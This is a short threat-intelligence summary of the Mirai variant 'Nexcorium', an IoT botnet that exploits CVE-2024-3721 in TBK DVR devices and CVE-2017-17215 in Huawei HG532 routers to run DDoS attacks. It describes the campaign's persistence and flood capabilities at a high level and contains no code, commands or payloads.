Tracking Mirai Variant Nexcorium: A Vulnerability-Driven IoT Botnet Campaign
Essential information
- Published
- 17/04/2026 18:56
- Modified
- 20/04/2026 10:52
- Tags
- 2026-04-17 CVE-2017-17215 CVE-2024-3721 credential brute-force ddos attacks iot botnet mirai mirai variant multi-architecture nexcorium persistence mechanisms tbk dvr exploitation
- Related entities
- 2 vulnerabilities (cve), 14 observables, 1 intrusion sets (apt), 19 techniques (mitre), 2 malware, 1 others
Description
Nexcorium is a multi-architecture Mirai variant exploiting CVE-2024-3721 in TBK DVR devices to build a botnet for distributed denial-of-service attacks. The campaign, attributed to Nexus Team based on custom HTTP headers, uses OS command injection to deliver malware across ARM, MIPS, and x86-64 architectures. The malware implements multiple persistence mechanisms including init configuration, startup scripts, systemd services, and cron jobs. It features XOR-encoded configurations, self-integrity checks, and self-replication capabilities. Attack capabilities include UDP flood, TCP SYN flood, TCP ACK flood, and VSE query flood among others. The botnet spreads through brute-force attacks using default credentials and exploits CVE-2017-17215 targeting Huawei HG532 devices, demonstrating typical IoT-focused botnet characteristics.